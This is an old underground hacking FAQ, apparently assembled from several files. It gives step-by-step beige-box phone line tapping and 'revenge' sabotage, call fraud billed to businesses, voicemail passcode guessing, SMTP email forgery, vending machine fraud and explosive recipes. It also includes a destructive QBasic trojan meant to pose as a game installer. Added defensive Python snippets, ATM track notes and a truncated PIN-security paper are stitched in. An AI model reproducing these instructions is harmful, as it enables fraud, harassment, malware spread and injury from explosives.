^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

BEIGE BOXING 101
                         Field Phreaking
                           by Revolution

     At the beginning of the section in the Bell training manual
entitled "One million ways to catch and fry a phreak" it doesn't
have a disclaimer saying "for informational purposes only".  So why
the hell should I put one here?  Give this file to whoever you want,
just make sure it all stays together, same title, same byline.

     Field phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hi-tech revenge, anything
you can do from your own phone line and more, without paying for it,
or being afraid of being traced.  Just be ready to bail if you see
sirens.

How to make a beige box: Easiest box to make.  Cut your phone cord
before the jack, strip the wires a little.  You should see a red
(ring) wire and a green (tip) wire.  If you see yellow and black
wires too just ignore them.  Put one set of alligator clips on the
red wire and one on the green wire, and you're set.  (You want to
use your laptop computer, but you don't want to ruin your modem's
phone cord?  Just unscrew a jack from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a phone,
laptop, anything you can plug in a jack.)

How to use: What you have is a lineman's handset.  You can use it
from any bell switching apparatus (from now on sw. ap.).  These are
on phone poles, where your phone line meets your house, and near
payphones.  I'll go into detail below, but basically just open any
box on a telephone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a phone
jack.  These screws are where you need to attach your alligator
clips to get a dial tone.  Don't unscrew the screw, you'll just
fuck up some poor guy's line, and increase your chances of getting
caught.  After the wire goes around the screw, it normally twists
off into the air.  Put your clip on the end of the wire.  Do the
same with the other clip.  If you don't get a dial tone, then
switch terminals.

On telephone poles:

TTI terminals: These must have been built by phreaks, just for
beige boxing.  By far the easiest sw. ap. to use.  The only drawback
is that they only connect to one phone line.  These are the
fist-sized gray or black boxes that appear where a single phone line
meets the mother line.  They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front.  No bolts or screws to take
off, just snap up the top and you will see four screws.  Clip in
and happy phreaking.  Just click the top down and no one will ever
know you were there (except for the extra digits on their phone
bill.)

Green trees:  just about the hardest sw. ap. to beige from (tied
with the bell canister), but if it's the only one you can use, go for
it.  These are the 3 foot high green/gray metal columns that are no
wider than a telephone pole (which makes them different than the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign.  Usually green
trees are right at the base of phone poles, or within a foot or two
of them.  These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off.  Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be.  Ratchet this one off and the metal
sheet will swing open like a door.  On one side of the sheet will
be a paper with a list of #'s this tree connects to.  Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way.  The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig-zag pattern, so it's hard to find the terminals that match in
the right order to give you a dial tone.

Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide.  They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts.  I wouldn't open it, but with a little info
from friends and some social engineering, I learned that inside is
where two underground phone lines are spliced together.  Also inside
is either pressurized gas or gel.  Pretty messy.

Bell canisters:  attached to phone poles at waist level.  They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off.  Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.

Mother load: Largest sw. ap.  A large gray green box, like 6 x 4,
attached to a telephone pole about three feet off the ground.  a big
(foot or two diameter) cable should be coming out the top.
Somewhere on it is a label "MIRROR IMAGE CABLE".  It opens like a
cabinet with double doors.  Fasteners are located in the center of
the box and on the upper edge in the center.  Both of these are
held on with a 7/16 bolt.  Take the bolts off, and swing the doors
open.  On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to.  And in the box are the terminals. Normally 1,000
phones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 phones the box connects
to).

On houses: follow the phone line to someone's house, and then down
their wall.  Either it goes right into their house (then you're
screwed) or it ends in a plastic box.  The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off.  Inside are 4 terminals, yellow,
black, and red and green, the two you need.  Find the Christmas
colors, and phreak out.

On payphones: follow the phone line up from the phone, and sometimes
you'll find a little black box with two screws in it.  Undo this,
and you'll find a nice little phone jack. You don't even need your
beige box for that one.  If there's not one of those, follow the
wire to a wall it goes into, and sometimes there will be a sw. ap.
like those on houses (see above).  Payphones are normally pretty
secure now though, and you probably won't find any of those.

Phreaky things you can do:  Jesus, do I have to tell you lamers
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.

Hi-tech revenge!
Possibilities are endless, you have total control of this lamers
line.  Most of you guys are probably way to elite for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something a lot better:  Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telephone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two terminals with a paper clip or an alligator clip! His phone
will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week.
Then, of course, is the funniest prank:  Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (his
#)"

That's it.  Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi.  Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, E-mail revolution@delphi.com no PGP needed.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT PHONE NUMBER AM I CALLING FROM?
(from Skipster, et al)

This service is called ANI.

This number may not work, but try it anyway:
(800) 825-6060

Another thing to try is dialing 311 ... a recorded message tells you
your phone #.  Experiment, but 311 does work; if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I USE/DO ALLIANCE TELECONFERENCING?
(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference.  Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line.  Then call
and set up a teleconference for whenever to be billed to the line
you are calling from.  You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to choose the number of
ports for your conference call, and how to dial each participant.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK?
(from Token)
Just scroll through your favorite business magazine and look for
800#s.  Once you get a VMB system you can look for a box being used
and try the default passcodes <0000> , <9999> , etc.  Like on the
INet, most people are too dumb to change their passwd.  If you're
lucky you might get the root box (I did, the stupid ass's passwd
was <4321>).

=====================================================================
II. Fake E-mail
     (Fooling UUCP)

HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
(from Beelzebub, Doktor Nil w/ Belisarius)

1.  Telnet to port 25 of any internet server
       (eg. telnet site.name.and.address 25)
2.  If at all possible, AVOID TYPING "HELO".
3.  Type: rcpt to (person to receive fake mail){ENTER}
4.  Type: mail from (fake name and address){ENTER}
5.  The mail server should ok each time after each name.
6.  If it does not:
     a) type vrfy and then the name of the person
     b) as a last resort use helo, this will login your computer as
        having been the source of the mail
7.  Retype the commands, it should say ok now.
8.  Type: data{ENTER}
9.  The first line of the message will be the Subject line
10.  Enter your letter
11.  To send letter type a "." on an empty line.
12. Then type quit{ENTER}
13. This is traceable by any sysadmin ... don't harass people this
    way.
14. If the person receiving the mail uses a mail reader like elm,
    he/she will not see the telltale fake-message warning
    "Apparently-To: (name)".  Even if not, most people wouldn't know
    what it means anyway.
15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
    so as to make it look more believable and cover any add-ons the
    mail routine might try
16. Put a realistic mail header in the mail message to throw people
    off even more.  If there are To: and Date: lines then the
    program probably won't add them on.
17. Also try to telnet to the site where the recipient has his
    account.  This works better if you know how to fool it.
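What a message injected this way looks like on the receiving side, as
an added example that is not part of the original FAQ: a small Python
check for the marks the text itself mentions (the MTA-supplied
"Apparently-To:" standing in for a To: line, the headers a real mail
client would have written but a hand-typed session does not, and the
"Received:" line that records who really connected, which is why step
13 says this is traceable).  Both messages below are constructed for
the example; every host name, address and id in them is made up.

```python
"""Added example (not code from the original text): spotting the marks a
hand-forged SMTP session leaves in the delivered message.

'Apparently-To:' is what sendmail of that era added when the sender gave
no To: line; 'Received:' is written by each MTA and names the host that
actually connected, whatever the sender claimed in HELO or MAIL FROM."""
import email
import re
from email.utils import parseaddr

# Constructed sample: injected by talking SMTP to port 25 directly with a
# forged MAIL FROM and no To:/Date:/Message-ID: lines of its own.
FORGED = """\
Received: from president.whitehouse.gov (dialup-17.isp.example [198.51.100.17])
\tby mail.example.org (8.6.9/8.6.9) with SMTP id AA67890
\tfor <alice@example.org>; Mon, 3 Jul 1995 22:13:50 -0400
From: president@whitehouse.gov
Apparently-To: alice@example.org

Please report to the Oval Office at once.
"""

# Constructed sample: ordinary mail from a real client through the same MTA.
LEGIT = """\
Received: from mail.example.org (mail.example.org [192.0.2.10])
\tby mail.example.org (8.6.9/8.6.9) with SMTP id AA67891
\tfor <alice@example.org>; Mon, 3 Jul 1995 22:20:11 -0400
From: bob@example.org
To: alice@example.org
Date: Mon, 3 Jul 1995 22:20:05 -0400
Message-ID: <199507040220.AA67891@mail.example.org>
Subject: lunch

Noon?
"""

# "from <helo name> (<reverse dns> [<ip>])" as sendmail writes it.
ORIGIN_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([\d.]+)\]\)")


def originating_hop(raw):
    """Return (helo_name, reverse_dns, ip) for the first MTA hop, or None.

    Each MTA prepends its own Received: line, so the earliest hop is the
    LAST Received: header in the message."""
    msg = email.message_from_string(raw)
    received = msg.get_all("Received") or []
    if not received:
        return None
    m = ORIGIN_RE.search(received[-1])
    return m.groups() if m else None


def spoof_indicators(raw):
    """List the things about this message that point to a forged session."""
    msg = email.message_from_string(raw)
    findings = []
    if msg["Apparently-To"] is not None and msg["To"] is None:
        findings.append("no To: header; the MTA synthesised Apparently-To: from the envelope")
    for name in ("Date", "Message-ID"):
        if msg[name] is None:
            findings.append(f"missing {name}: header")
    hop = originating_hop(raw)
    if hop is not None:
        helo, rdns, ip = hop
        if helo.lower() != rdns.lower():
            findings.append(f"HELO name {helo} does not match reverse DNS {rdns} [{ip}]")
        _, addr = parseaddr(msg.get("From", ""))
        domain = addr.rpartition("@")[2].lower()
        if domain and rdns.lower() != domain and not rdns.lower().endswith("." + domain):
            findings.append(f"From: domain {domain} never appeared at the originating hop {rdns} [{ip}]")
    return findings


if __name__ == "__main__":
    for label, sample in (("forged", FORGED), ("legit", LEGIT)):
        print(label, originating_hop(sample), spoof_indicators(sample))
```

The HELO name is whatever the sender typed and is worth nothing on its
own; the name in parentheses is what the receiving MTA resolved for the
connecting address, and that, plus the MTA's own log of the session, is
what a sysadmin follows back.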

=====================================================================
III. Social Engineering
     (Free sodas, Dumpster Diving, ATMs, Carding)

WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ANOTHER WAY OF GETTING FREE SODAS?
This is an easier and actually more reliable way of getting free
sodas.  It only works on some machines though, usually Coca-Cola.
Anyways, put in your change and as the last coin goes down the slot
start rapidly and repeatedly pressing the button of your choice.
If everything works well, then you should get two sodas and your
change back.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW ARE THE TRACKS OF ATM CARD ARRANGED?

The physical layout of the cards is standard.  The logical arrangement
of the data stored on the magnetic strip varies from institution to
institution.  There are some generally followed layouts, but they are
not mandatory.

There are actually up to three tracks on a card.

Track 1:
Designed for airline use.  Contains name and possibly your account
number.  This is the track that is used when the ATM greets you
by name.  There is a lot of variation in how things are ordered so
occasionally you get 'Greetings Q. John Smith' or
'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
This track is also used
with the new airline auto check in (PSA, American, etc).

Track 2:
The main operational track for online use.  The first thing
on the track is the Primary Account Number (PAN).  This is usually
pretty standard for all cards.  Some additional info might be on the
card such as expiration date.
One interesting item is the PIN (Personal Identification Number)
offset.  When an ATM verifies a PIN locally, it usually uses an
encryption scheme involving the PAN and a secret KEY.  This gives you
a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
generated).  If you want to select your own PIN, they would put the
PIN OFFSET in the clear on the card.  Just do modulo 10 arithmetic on
the Natural PIN plus the offset, and you have the selected PIN.
The PIN is never in the clear on your card.  Knowing the PIN OFFSET
will not give you the PIN.  This will require the SECRET KEY.

Track 3:
The "OFF-LINE" ATM track.  It contains information such as your daily
limit, limit left, last access, account number, and expiration date.
The ATM itself could have the ability to write to this track to
update information.

=====================================================================
IV. The Big Bang
     (Making Weapons and Explosives)

FLASH POWDERS:
(from Neurophyre)

Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
   nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
   eyes.

 REAL Cherry Bomb Powder
    4 parts by weight of potassium perchlorate
        1 part by weight of antimony trisulfide
        1 part by weight aluminum powder

 Relatively Safe
    3 parts by weight of potassium permanganate
    2 parts by weight of aluminum powder

 *VERY* Shock/Friction/Static/Heat Sensitive!
 Use only if suicidal or desperate!
    4 parts by weight of potassium chlorate
        1 part by weight of sulfur
        1 part by weight of aluminum powder

1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get.  Use a mortar and
pestle if available, and grind GENTLY.  Do not use plastic as this can
build a static charge.  Remember, do them SEPARATELY.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING:  This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!!  AVOID IT when dry!  DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
   This bucket will never be clean again, in all likelihood.
   Try to get clear (non-pine, non-cloudy) ammonia.  Or use an
   ammonium hydroxide solution from a chemlab.  This results in better
   but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
   preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
   the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW TO BUILD A TENNIS BALL CANNON?
1. Get six (6) tin cans.
2. From five of them remove the tops and bottoms.
3. From the last one remove only the top. (this is the last can to
   make the breach)
4. The cans should overlap and be fit together to make a long barrel
   closed at one end and open at the other.

                 ___________________________________
    open -->    ()____)_____)_____)_____)_____)_____)    <--closed
    (barrel)           1     2     3     4     5     6          (breach)

5. Duct tape all of the cans together.  USE LOTS OF TAPE!!
6. Put some gunpowder in the bottom of the CANnon.
7. Aim, brace the CANnon.
8. Spray hairspray or pour alcohol on the tennis ball and light.
9. Drop the ball into the can and STAND BACK!

Other ideas:
a) Make explosive tennis balls.
b) Launch potatoes.
c) Launch thumbtacks, nails, broken glass, etc.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)?
(from Terrorist's Handbook)
Materials: cotton, concentrated nitric acid, concentrated sulfuric
           acid, distilled water

Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
           litmus paper

Procedure: 1.  Pour 10mL of sulfuric acid into beaker.
            2.  Pour 10mL of nitric acid into beaker with sulfuric
               acid.
           3.  Immediately add 0.5 gram of cotton.
           4.  Allow it to soak for EXACTLY three(3) minutes.
           5.  Remove the nitrocellulose.
           6.  Put the nitrocellulose into a beaker of distilled
               water to wash it in.
           7.  Allow the material to dry.
           8.  Re-wash it.
           9.  Once neutral(acid/base) it can be dried and stored.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THERMITE AND HOW DO I MAKE IT?
Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
and can be used to burn through most anything.

Materials: powdered aluminum, powdered iron oxide

Procedure: mix the two powders together as evenly as possible

Ignition:  thermite is difficult to ignite but these work
            a) mix a small amount of potassium chlorate into the
               thermite mixture and ignite with a few drops of
               sulfuric acid
            b) magnesium strip or 'sparkler' stuck into the powder
               which is then lit as a fuse

=====================================================================
V. Infection
     (Virii, Trojans, Worms and other creepy crawlies)

WHERE CAN I GET SOME VIRII?
The Virus eXchange BBS in Bulgaria.  [number not available - :( ]
Problem:  They demand a virus they don't have in their archives to
let you in.  Good luck finding one.  The best way is to write one,
even if it's in BASIC. It'll probably get you in.  They have
THOUSANDS of virii.  IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to wiretap.spies.com and dig
around in their online library under technical info.

There are a lot of places in the US to get virii too:
The Hell Pit in Chicago has over 1500, and they don't accept the
lame stuff like the ones written in basic, so they're all good ones.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

INTS USED:
(from Belisarius)
You want INT 13h, AH=03h (the BIOS "write disk sectors" call):
AL = number of sectors to write
ES:BX = segment:offset of the buffer to write from
CH = cylinder number (the low 8 bits of the 10-bit cylinder number)
CL = sector number in bits 0-5, high 2 bits of the cylinder number in
     bits 6-7
DH = head number
DL = drive number (bit 7 = 0 for floppy, 1 for fixed disk)

On return: AH = status, AL = number of sectors written, carry flag set
if an error occurred.
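The bit packing of those registers, as an added example (not from the
original text): it implements only the cylinder/head/sector register
encoding the entry describes, with range checks, and not the BIOS call
itself.

```python
"""Added example (not from the original text): packing and unpacking the
cylinder/head/sector registers the INT 13h write call takes.  Layout as
described above: CH = low 8 bits of the 10-bit cylinder, CL bits 6-7 =
high 2 bits of the cylinder, CL bits 0-5 = sector (1-63), DH = head,
DL bit 7 = 1 for a fixed disk and 0 for a floppy."""


def pack_chs(cylinder, sector, head):
    """Return (CH, CL, DH) for a BIOS disk call; raise on out-of-range input."""
    if not 0 <= cylinder <= 1023:
        raise ValueError("cylinder must fit in 10 bits")
    if not 1 <= sector <= 63:
        raise ValueError("sector is 1-based and must fit in 6 bits")
    if not 0 <= head <= 255:
        raise ValueError("head must fit in 8 bits")
    ch = cylinder & 0xFF
    cl = (((cylinder >> 8) & 0x03) << 6) | sector
    return ch, cl, head


def unpack_chs(ch, cl, dh):
    """Inverse of pack_chs: recover (cylinder, sector, head) from the registers."""
    cylinder = ((cl & 0xC0) << 2) | ch
    sector = cl & 0x3F
    return cylinder, sector, dh


def drive_number(index, fixed_disk):
    """DL: 0x00, 0x01, ... for floppies; 0x80, 0x81, ... for fixed disks."""
    if not 0 <= index <= 0x7F:
        raise ValueError("drive index must fit in 7 bits")
    return (0x80 | index) if fixed_disk else index


if __name__ == "__main__":
    regs = pack_chs(0x2A5, 7, 1)
    print([hex(r) for r in regs], unpack_chs(*regs), hex(drive_number(0, True)))
```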

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

SAMPLE OF A TROJAN
(from Spear)

This is a little trojan I wrote in Qbasic 4.5  It's a bitch!

REM bitch by Spear
color 14,0
print"installing datafiles...  Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"

How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!

What does it do?
This program changes directory to the root and makes 100000 dirs in
the root.  You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md.  To get rid of them any other way you
would have to format c: or d:
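The "rd instead of md" cleanup the text refers to, as an added example
(not code from the original): it removes only empty directories whose
name matches the trojan's <number>.hee pattern, runs dry by default, and
the demo works in a scratch directory rather than the real drive root.

```python
"""Added example (not code from the original text): cleaning up after the
directory-flooding trojan above.  Only empty directories named
<number>.hee are touched, because that is all the trojan creates; the
demo plants a few in a temporary directory and removes them."""
import os
import re
import tempfile

# str$(a) in QBasic yields " 1", " 2", ...; "md 1.hee" therefore creates 1.hee.
DROPPED_NAME = re.compile(r"^\d{1,6}\.hee$", re.IGNORECASE)


def find_dropped_dirs(root):
    """Directories directly under root whose names match the trojan's pattern."""
    return sorted(name for name in os.listdir(root)
                  if DROPPED_NAME.match(name) and os.path.isdir(os.path.join(root, name)))


def remove_dropped_dirs(root, dry_run=True):
    """Remove matching *empty* directories; anything with content is left
    alone.  Returns the names removed (or, on a dry run, that would be)."""
    removed = []
    for name in find_dropped_dirs(root):
        path = os.path.join(root, name)
        if os.listdir(path):
            continue
        if not dry_run:
            os.rmdir(path)
        removed.append(name)
    return removed


def demo():
    """Plant dropped directories plus two decoys in a scratch directory, then clean up."""
    with tempfile.TemporaryDirectory() as root:
        for i in (1, 2, 3, 100000):
            os.mkdir(os.path.join(root, f"{i}.hee"))
        os.mkdir(os.path.join(root, "real.hee"))            # name does not match
        os.makedirs(os.path.join(root, "4.hee", "keep"))    # matches but is not empty
        planned = remove_dropped_dirs(root)                 # dry run first
        removed = remove_dropped_dirs(root, dry_run=False)
        left = sorted(os.listdir(root))
    return planned, removed, left


if __name__ == "__main__":
    print(demo())
```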

-=-=-=-=-=-=-=-=-=-=-=-=-=- END of HAQ1.07/1 -=-=-=-=-=-=-=-=-=-=-=--=

                             -=*( Prophet )*=-
    ____                   __         __ 
   / __ \_________  ____  / /_  ___  / /_   The Truth Is Out There...
  / /_/ / ___/ __ \/ __ \/ __ \/ _ \/ __/
 / ____/ /  / /_/ / /_/ / / / /  __/ /_     Trust No-One...
/_/   /_/   \____/ .___/_/ /_/\___/\__/  
                /_/                         Do Not Fear The Reaper,
prophet@illumini.demon.co.uk                Fear Your God-Damn Government

Track Layouts on ATM Cards

***************  Track Layouts ************************
This is off the top of my head, but is 99% there.  Also I'll ignore
some obsolete stuff.

The physical layout of the cards is standard.  The LOGICAL makeup
varies from institution to institution.  There are some generally
followed layouts, but they are not mandatory.

There are actually up to three tracks on a card.

Track 1 was designed for airline use.  It contains your name and
usually your account number.  This is the track that is used when
the ATM greets you by name.  There are some glitches in how things
are ordered so occasionally you do get "Greetings Bill Smith Dr."
but such is life.  This track is also used with the new airline
auto check in (PSA, American, etc)

Track 3 is the "OFF-LINE" ATM track.  It contains such nifty
information as your daily limit, limit left, last access, account
number, and expiration date.  (And usually anything I describe in track
2).  The ATM itself could have the ability to rewrite this track to
update information.

Track 2 is the main operational track for online use.  The first thing
on track two is the PRIMARY ACCOUNT NUMBER (PAN).  This is pretty
standard for all cards, though no guarantee.  Some additional info
might be on the card such as expiration date.  One interesting item
is the PIN offset.   When an ATM verifies a PIN locally, it usually
uses an encryption scheme involving the PAN and a secret KEY.
This gives you a "NATURAL PIN" (i.e. when they mail you your pin, this
is how it got generated.)  If you want to select your own PIN, they
would put the PIN OFFSET in the clear on the card.  Just do modulo 10
arithmetic on the Natural PIN plus the offset, and you have the
selected PIN.  YOUR PIN IS NEVER IN THE CLEAR ON YOUR CARD.  Knowing
the PIN OFFSET will not give you the PIN.  This will required the
SECRET KEY.

Hope that answers your question

************ Deposits at ATMs ************************

Deposits on ATM:

Various banks have various systems.  As an example, at CITIbank
a deposit was made to a specific account.  Your account was updated
with a MEMO update, i.e. it would show up on your balance.  However
it did not become AVAILABLE funds until it was verified by a teller.
On the envelope was Customer ID number, the envelope number and
the Entered dollar amount, the branch # and the Machine #.

There was also a selection for OTHER PAYMENTS.  This allowed you to
dump any deposit into the ATM.

What are you assured then when you deposit to an ATM ?

1) You have a banking RECORD (not a reciept at Citibank).  If you
   have this record, there is a VERY high percentage that you
   deposited something at that ATM.

2) Some banks have ways of crediting your deposit RIGHT NOW.
   This could be done by a balance in another account (i.e. a long
   term C.D. or a line of credit.)  That way they can get you if
   you lied.

**************  ATM Splitting a Card in half ***************

   I've worked with about 75% of the types of machines on the market
and NONE of them split a card in half upon swallow.  However, some
NETWORKS have a policy of  slicing a card to avoid security
problems.

Trusting an ATM.
Intresting you should bring this up, I'm just brusing up a paper
describing a REAL situation where your card and PIN are in the clear.
This involves a customer using a bank that is part of a network.
All the information was available to folks in DP, if they put in some
efforts to get it.

          Mis-Implementation of an ATM PIN security system

1.  Synopsis
In an EFT (Electronic Funds Transfer) network, a single node which  does
not  implement  the  proper  security  can  have  effects throughout the
network.  In this paper, the author describes an example of how security
features  were  ignored, never-implemented, and/or incorrectly designed.
The human factors involved in the final implementation are  explored  by
showing  several major vulnerabilites caused by a Savings and Loan and a
regional EFT network's lack of vigilance in installing  an  EFT  network
node.   While  using  an  EFT  system as an example, the concepts can be
extrapolated into the implementation of other secured systems.

2.  Background
A small Savings and Loan  was  setting  up  a  small  (10  to  16  ATMs)
proprietary  Automatic  Teller  Machine (ATM) network.  This network was
then intended to link up to a regional network.  The manufacturer of the
institution's  online  banking  processor  sent an on-site programmer to
develop the required interfaces.

An ATM network consists of three main  parts.   The  first  is  the  ATM
itself.   An ATM can have a range of intelligence.  In this case the ATM
was able to decode a  PIN  (Personal  Identification  Number)  using  an
institution  supplied  DES  (Data Encryption Standard) key.  It was then
required to send a request for funds to the host where it would receive
authorization.

The second portion of the network is the ATM controller.  The controller
monitors the transaction, and routes the message  to  the  authorization
processor.   The  controller  would  also generally monitor the physical
devices and statuses of the ATM.

The third portion of the network is the authorization system.   In  this
case  customers  of  the  local  institution  would have the transaction
authorized on the same processor.  Customers  from  foreign  (i.e.   one
that  does not belong to the institution that runs the ATM) institutions
would be authorized by the regional  network.   Authorization  could  be
from  a  run-up  file which maintains establishes a limit on withdrawals
for a  given  account  during  a  given  period.   A  better  method  is
authorization direct from the institution which issued the card.

3.  Security
The system has a two component key system to allow access to the network
by the customer.  The first  is  the  physical  ATM  card  which  has  a
magnetic stripe.  The magnetic stripe contains account information.  The
second component is the Personal Identification Number (PIN).   The  PIN
is hand entered by the customer into the ATM at transaction time.  Given
these  two  parts,  the  network  will  assume  that  the  user  is  the
appropriate customer and allow the transaction to proceed.

The Magnetic stripe is in the clear and may be assume to be reproducible
using various methods, thus the PIN is crucial security.

 Security PIN security

3.1.  PIN security

3.1.1.  PIN key validation method

PINs can be linked up to a particular card in a  number  of  ways.   One
method  puts  the  PIN  into  a central data base in a one-way encrypted
format.  When a PIN is presented, it  would  be  encrypted  against  the
format  in  the  data base.  This method requires a method of encrypting
the PIN given at the ATM, until it can be verified at the central  site.
Problems  can  also  occur if the institution wants to move the PIN data
base to another processor, especially from a different computer vendor.

Another  method  is  to take information on the card, combine it with an
institution PIN encryption key (PIN key) and use that  to  generate  the
PIN.   The institution in question used the PIN key method.  This allows
the customer to be verified at the ATM itself and no transmission of the
PIN  is  required.   The  risk  of  the  system  is  the PIN key must be
maintained under the tightest of security.

The PIN key is used to generate the natural PIN.   This  is  derived  by
taking  the  account number and using DES upon it with the PIN key.  The
resulting number then is decimialized by doing a lookup on  a  16  digit
decimalization  table  to  convert  the  resulting hexadecimal digits to
decimal digits.  An ATM loaded with the appropriate  PIN  key  can  then
validate  a customer locally with no need to send PIN information to the
network, thereby reducing the risk of compromise.

The PIN key requires the utmost security.  Once the PIN  key  is  known,
any  customer's  ATM card, with corresponding PIN can be created given a
customer account number.  The ATM allows for the PIN to  be  entered  at
the  ATM  in  two parts, thus allowing each of two bank officers to know
only one half of the key.  If desired, a terminal  master  key  can  be
loaded and then the encrypted PIN key loaded from the network.

The  decimalization table usually consists of 0 to 9 and 0 to 5, ("0" to
"F" in hexadecimal where "F" = 15).  The decimalization table can be put
into any order, scrambling the digits and slowing down an attacker.  (As
a side note, it could be noted that using the "standard" table, the  PIN
digits  are  weighted  to 0 through 5, each having a 1/8 chance of being
the digit, while 6 through 9 has only a 1/16 chance.)

When handling a foreign card, (i.e.  one that does  not  belong  to  the
institution that runs the ATM), the PIN must be passed on to the network
in encrypted form.  First, however, it must be passed from  the  ATM  to
the  ATM controller.  This is accomplished by encrypting the PIN entered
at  the  ATM  using  a  communication  key  (communication   key),   The
communication  key  is  entered  at  the  ATM much like the PIN key.  In
addition, it can be downloaded from the network.  The PIN  is  decrypted
at  the controller and then reencrypted with the network's communication
key.

                                 - 2 -

Security
PIN security
PIN key validation method

